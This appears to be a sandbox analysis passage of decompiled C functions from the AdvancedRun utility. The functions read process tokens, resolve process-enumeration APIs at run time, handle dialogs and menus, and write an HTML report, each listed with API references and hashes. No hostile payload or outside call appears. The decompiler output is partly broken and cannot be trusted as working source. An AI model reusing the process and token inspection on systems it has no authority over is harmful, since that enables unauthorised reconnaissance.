• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
• String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3037099051-2314623505
• Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
• Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
• Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
• Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 44%
E00409A94(long _a4, intOrPtr _a8) {
    int _v8;
    int _v12;
    int _v16;
    void* _v20;
    void* _v24;
    char _v28;
    intOrPtr _v32;
    char _v36;
    char _v44;
    char _v52;
    char _v60;
    void _v315;
    char _v316;
    void _v826;
    char _v828;
    void _v1338;
    char _v1340;
    void* __esi;
    void* _t61;
    _Unknown_base(*)()* _t93;
    void* _t94;
    int _t106;
    void* _t108;
    void* _t110;
    void* _t113;     /* temporaries used below but left undeclared by the decompiler */
    void* _t117;
    void** _t32;

    _v828 = 0;
    memset( &_v826, 0, 0x1fe);           /* first output string (0xff wide chars) */
    _v1340 = 0;
    memset( &_v1338, 0, 0x1fe);          /* second output string (0xff wide chars) */
    _t110 = _t108 + 0x18;
    _t61 = OpenProcess(0x400, 0, _a4);   /* PROCESS_QUERY_INFORMATION on the process id in _a4 */
    _t113 = _t61;
    _v20 = _t61;
    if(_t61 == 0) {
        L11:
        if(_v828 == 0) {
            __eflags = 0;
            return 0;                    /* nothing was resolved */
        }
        /* _snwprintf(_a8, 0xff, L"%s\\%s", &_v1340, &_v828): join both strings into the caller's buffer (see APIs, ref 00409C5A) */
        _push( &_v828);
        _push( &_v1340);
        _push(L"%s\\%s");
        _push(0xff);
        _push(_a8);
        L0040B1EC();
        return 1;
    }
    _v8 = 0;
    _v24 = 0;
    E00408F92( &_v8, _t113, _t61, 8,  &_v24);   /* OpenProcessToken resolved via GetProcAddress (see APIs); token handle lands in _v24 */
    _t106 = _v24;
    if(_t106 == 0) {
        /* no token handle: fall back to a lookup keyed by the process handle */
        _t32 =  &_v20; // 0x4059ec
        E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
        _v316 = 0;
        memset( &_v315, 0, 0xfe);
        _t110 = _t110 + 0x20;
        _v16 = 0xff;
        __eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
        if(__eflags == 0) {
            L9:
            CloseHandle(_v20);           /* common cleanup path */
            if(_v8 != 0) {
                FreeLibrary(_v8);
            }
            goto L11;
        }
        _push( &_v28);
        _push( &_a4);
        _push( &_v1340);
        _push( &_v12);
        _push( &_v828);
        _a4 = 0xff;
        _push( &_v316);
        L8:
        _v12 = 0xff;
        E0040906D( &_v8, _t117);         /* consumes the pushed arguments and fills _v828 / _v1340 */
        goto L9;
    }
    _v316 = 0;
    memset( &_v315, 0, 0xff);            /* receives the TOKEN_USER structure */
    _v12 = _t106;
    _t110 = _t110 + 0xc;
    _a4 = 0;
    if(E00408F72( &_v8) == 0) {
        goto L9;
    }
    _t93 = GetProcAddress(_v8, "GetTokenInformation");   /* resolved at run time rather than imported */
    if(_t93 == 0) {
        goto L9;
    }
    _t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);       /* GetTokenInformation(hToken, TokenUser = 1, buf, 0xff, &returnLength) */
    _t117 = _t94;
    if(_t94 == 0) {
        goto L9;
    }
    _push( &_v28);
    _push( &_v12);
    _push( &_v1340);
    _push( &_v16);
    _push( &_v828);
    _push(_v316);
    _v16 = 0xff;
    goto L8;
}

APIs
• memset.MSVCRT ref: 00409AB7
• memset.MSVCRT ref: 00409ACF
• OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
• _snwprintf.MSVCRT ref: 00409C5A
  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
• memset.MSVCRT ref: 00409B25
• GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
• memset.MSVCRT ref: 00409BC7
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
• FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
Strings
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
• String ID: %s\%s$GetTokenInformation$Y@
• API String ID: 3504373036-27875219
• Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
• Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
• Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
• Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00409172() {
    void* _t1;
    int _t2;
    struct HINSTANCE__* _t5;

    if( *0x4101bc != 0) {            /* global flag: PSAPI exports already resolved */
        return _t1;                  /* decompiler artifact: _t1 is never assigned (EAX as left by the caller) */
    }
    _t2 = E00405436(L"psapi.dll");   /* load psapi.dll through helper E00405436 */
    _t5 = _t2;
    if(_t5 == 0) {
        L10:
        return _t2;
    } else {
        /* resolve each PSAPI export at run time and cache the pointer in a global */
        _t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
         *0x40f848 = _t2;
        if(_t2 != 0) {
            _t2 = GetProcAddress(_t5, "EnumProcessModules");
             *0x40f840 = _t2;
            if(_t2 != 0) {
                _t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                 *0x40f838 = _t2;
                if(_t2 != 0) {
                    _t2 = GetProcAddress(_t5, "EnumProcesses");
                     *0x40fa6c = _t2;
                    if(_t2 != 0) {
                        _t2 = GetProcAddress(_t5, "GetModuleInformation");
                         *0x40f844 = _t2;
                        if(_t2 != 0) {
                             *0x4101bc = 1;   /* all five exports found: mark as initialised */
                        }
                    }
                }
            }
        }
        if( *0x4101bc == 0) {
            _t2 = FreeLibrary(_t5);  /* at least one lookup failed: release the library again */
        }
        goto L10;
    }
}






                                                                  0x00409179
                                                                  0x00409209
                                                                  0x00409209
                                                                  0x00409185
                                                                  0x0040918a
                                                                  0x0040918f
                                                                  0x00409208
                                                                  0x00000000
                                                                  0x00409191
                                                                  0x0040919e
                                                                  0x004091a2
                                                                  0x004091a7
                                                                  0x004091af
                                                                  0x004091b3
                                                                  0x004091b8
                                                                  0x004091c0
                                                                  0x004091c4
                                                                  0x004091c9
                                                                  0x004091d1
                                                                  0x004091d5
                                                                  0x004091da
                                                                  0x004091e2
                                                                  0x004091e6
                                                                  0x004091eb
                                                                  0x004091ed
                                                                  0x004091ed
                                                                  0x004091eb
                                                                  0x004091da
                                                                  0x004091c9
                                                                  0x004091b8
                                                                  0x004091ff
                                                                  0x00409202
                                                                  0x00409202
                                                                  0x00000000
                                                                  0x004091ff

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1182944575-70141382
                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004090EE() {
                                                                  				void* _t1;
                                                                  				_Unknown_base(*)()* _t2;
                                                                  				struct HINSTANCE__* _t4;
                                                                  
                                                                  				if( *0x4101b8 != 0) {
                                                                  					return _t1;
                                                                  				}
                                                                  				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                  				_t4 = _t2;
                                                                  				if(_t4 == 0) {
                                                                  					L9:
                                                                  					return _t2;
                                                                  				}
                                                                  				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                  				 *0x40f83c = _t2;
                                                                  				if(_t2 != 0) {
                                                                  					_t2 = GetProcAddress(_t4, "Module32First");
                                                                  					 *0x40f834 = _t2;
                                                                  					if(_t2 != 0) {
                                                                  						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                  						 *0x40f830 = _t2;
                                                                  						if(_t2 != 0) {
                                                                  							_t2 = GetProcAddress(_t4, "Process32First");
                                                                  							 *0x40f5c4 = _t2;
                                                                  							if(_t2 != 0) {
                                                                  								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                  								 *0x40f828 = _t2;
                                                                  								if(_t2 != 0) {
                                                                  									 *0x4101b8 = 1;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				goto L9;
                                                                  			}






                                                                  0x004090f5
                                                                  0x00409171
                                                                  0x00409171
                                                                  0x004090fd
                                                                  0x00409103
                                                                  0x00409107
                                                                  0x00409170
                                                                  0x00000000
                                                                  0x00409170
                                                                  0x00409116
                                                                  0x0040911a
                                                                  0x0040911f
                                                                  0x00409127
                                                                  0x0040912b
                                                                  0x00409130
                                                                  0x00409138
                                                                  0x0040913c
                                                                  0x00409141
                                                                  0x00409149
                                                                  0x0040914d
                                                                  0x00409152
                                                                  0x0040915a
                                                                  0x0040915e
                                                                  0x00409163
                                                                  0x00409165
                                                                  0x00409165
                                                                  0x00409163
                                                                  0x00409152
                                                                  0x00409141
                                                                  0x00409130
                                                                  0x00000000

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                  • API String ID: 667068680-3953557276
                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 56%
                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				char _v1028;
                                                                  				void _v1538;
                                                                  				char _v1540;
                                                                  				void* _t39;
                                                                  				intOrPtr* _t50;
                                                                  				void* _t61;
                                                                  
                                                                  				_t50 = __ecx;
                                                                  				_push(0x1fe);
                                                                  				_push(0);
                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                  					_v1540 = 0;
                                                                  					memset( &_v1538, ??, ??);
                                                                  					_v1028 = 0;
                                                                  					memset( &_v1026, 0, 0x1fe);
                                                                  					_v516 = 0;
                                                                  					memset( &_v514, 0, 0x1fe);
                                                                  					L0040B1EC();
                                                                  					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                  					L0040B1EC();
                                                                  					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                  					if (_t39 != 0) goto L3;
                                                                  					return _t39;
                                                                  				}
                                                                  				_v516 = 0;
                                                                  				memset( &_v514, ??, ??);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fe);
                                                                  				L0040B1EC();
                                                                  				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                  				L0040B1EC();
                                                                  				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                  			}












                                                                  0x00409faf
                                                                  0x00409fb4
                                                                  0x00409fb5
                                                                  0x00409fb6
                                                                  0x0040a043
                                                                  0x0040a04a
                                                                  0x0040a058
                                                                  0x0040a05f
                                                                  0x0040a06d
                                                                  0x0040a074
                                                                  0x0040a08e
                                                                  0x0040a099
                                                                  0x0040a0ab
                                                                  0x0040a0c9
                                                                  0x0040a0ce
                                                                  0x00000000
                                                                  0x0040a0ce
                                                                  0x00409fc3
                                                                  0x00409fca
                                                                  0x00409fd8
                                                                  0x00409fdf
                                                                  0x00409ff9
                                                                  0x0040a006
                                                                  0x0040a018
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: %%0.%df
                                                                  • API String ID: 3473751417-763548558
                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 51%
                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                  				void _v8202;
                                                                  				short _v8204;
                                                                  				void* _t27;
                                                                  				short _t29;
                                                                  				short _t40;
                                                                  				void* _t41;
                                                                  				struct HMENU__* _t43;
                                                                  				short _t50;
                                                                  				void* _t52;
                                                                  				struct HMENU__* _t59;
                                                                  
                                                                  				E0040B550(0x2008, __ecx);
                                                                  				_t65 = _a8 - 4;
                                                                  				if(_a8 != 4) {
                                                                  					__eflags = _a8 - 5;
                                                                  					if(_a8 == 5) {
                                                                  						_t50 =  *0x40fe2c; // 0x0
                                                                  						__eflags = _t50;
                                                                  						if(_t50 == 0) {
                                                                  							L8:
                                                                  							_push(_a12);
                                                                  							_t27 = 5;
                                                                  							E00405E8D(_t27);
                                                                  							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                  							__eflags = _t29;
                                                                  							_a8 = _t29;
                                                                  							if(_t29 == 0) {
                                                                  								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                  							}
                                                                  							_v8204 = 0;
                                                                  							memset( &_v8202, 0, 0x2000);
                                                                  							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                  							__eflags = _v8204;
                                                                  							if(__eflags != 0) {
                                                                  								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                  							}
                                                                  							EnumChildWindows(_a8, E0040614F, 0);
                                                                  							DestroyWindow(_a8);
                                                                  						} else {
                                                                  							while(1) {
                                                                  								_t40 =  *_t50;
                                                                  								__eflags = _t40;
                                                                  								if(_t40 == 0) {
                                                                  									goto L8;
                                                                  								}
                                                                  								__eflags = _t40 - _a12;
                                                                  								if(_t40 != _a12) {
                                                                  									_t50 = _t50 + 4;
                                                                  									__eflags = _t50;
                                                                  									continue;
                                                                  								}
                                                                  								goto L13;
                                                                  							}
                                                                  							goto L8;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					_push(_a12);
                                                                  					_t41 = 4;
                                                                  					E00405E8D(_t41);
                                                                  					_pop(_t52);
                                                                  					_t43 = LoadMenuW(_a4, _a12);
                                                                  					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                  					_t59 = _t43;
                                                                  					_push(1);
                                                                  					_push(_t59);
                                                                  					_push(_a12);
                                                                  					E0040605E(_t52, _t65);
                                                                  					DestroyMenu(_t59);
                                                                  				}
                                                                  				L13:
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32(?), ref: 00406074
                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                  • memset.MSVCRT ref: 004062DA
                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                  • String ID: caption
                                                                  • API String ID: 973020956-4135340389
                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 65%
                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                  				void _v2050;
                                                                  				char _v2052;
                                                                  				void _v4098;
                                                                  				long _v4100;
                                                                  				void _v6146;
                                                                  				char _v6148;
                                                                  				void* __esi;
                                                                  				void* _t43;
                                                                  				intOrPtr* _t49;
                                                                  				intOrPtr* _t57;
                                                                  				void* _t58;
                                                                  				void* _t59;
                                                                  				intOrPtr _t62;
                                                                  				intOrPtr _t63;
                                                                  
                                                                  				_t49 = __ecx;
                                                                  				E0040B550(0x1800, __ecx);
                                                                  				_t57 = _t49;
                                                                  				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                  				_v4100 = 0;
                                                                  				memset( &_v4098, 0, 0x7fe);
                                                                  				_v2052 = 0;
                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                  				_v6148 = 0;
                                                                  				memset( &_v6146, 0, 0x7fe);
                                                                  				_t59 = _t58 + 0x24;
                                                                  				_t62 =  *0x40fe30; // 0x0
                                                                  				if(_t62 != 0) {
                                                                  					_push(0x40fe30);
                                                                  					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                  					_push(0x400);
                                                                  					_push( &_v2052);
                                                                  					L0040B1EC();
                                                                  					_t59 = _t59 + 0x10;
                                                                  				}
                                                                  				_t63 =  *0x40fe28; // 0x0
                                                                  				if(_t63 != 0) {
                                                                  					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                  				}
                                                                  				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                  				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                  				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                  				_push(0x400);
                                                                  				_push( &_v6148);
                                                                  				L0040B1EC();
                                                                  				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                  				_t64 = _a8 - 5;
                                                                  				if(_a8 == 5) {
                                                                  					return E00407D03(_t57, _t64, _a4);
                                                                  				}
                                                                  				return _t43;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                  • API String ID: 1283228442-2366825230
                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                  				void _v526;
                                                                  				long _v528;
                                                                  				wchar_t* _t17;
                                                                  				signed int _t40;
                                                                  				wchar_t* _t50;
                                                                  
                                                                  				_t50 = __edi;
                                                                  				if(__esi[0] != 0x3a) {
                                                                  					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                  					if(_t17 == 0) {
                                                                  						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                  						if(_t40 < 0) {
                                                                  							if( *__esi != 0x5c) {
                                                                  								wcscpy(__edi, __esi);
                                                                  							} else {
                                                                  								_v528 = 0;
                                                                  								memset( &_v526, 0, 0x208);
                                                                  								E00404C08( &_v528);
                                                                  								memcpy(__edi,  &_v528, 4);
                                                                  								__edi[1] = __edi[1] & 0x00000000;
                                                                  								wcscat(__edi, __esi);
                                                                  							}
                                                                  						} else {
                                                                  							_v528 = 0;
                                                                  							memset( &_v526, 0, 0x208);
                                                                  							E00404C08( &_v528);
                                                                  							wcscpy(__edi,  &_v528);
                                                                  							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                  						}
                                                                  						L11:
                                                                  						return _t50;
                                                                  					}
                                                                  					_push( &(_t17[0]));
                                                                  					L4:
                                                                  					wcscpy(_t50, ??);
                                                                  					goto L11;
                                                                  				}
                                                                  				_push(__esi);
                                                                  				goto L4;
                                                                  			}

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409223
                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                  • memset.MSVCRT ref: 00409269
                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                  • memset.MSVCRT ref: 004092B1
                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
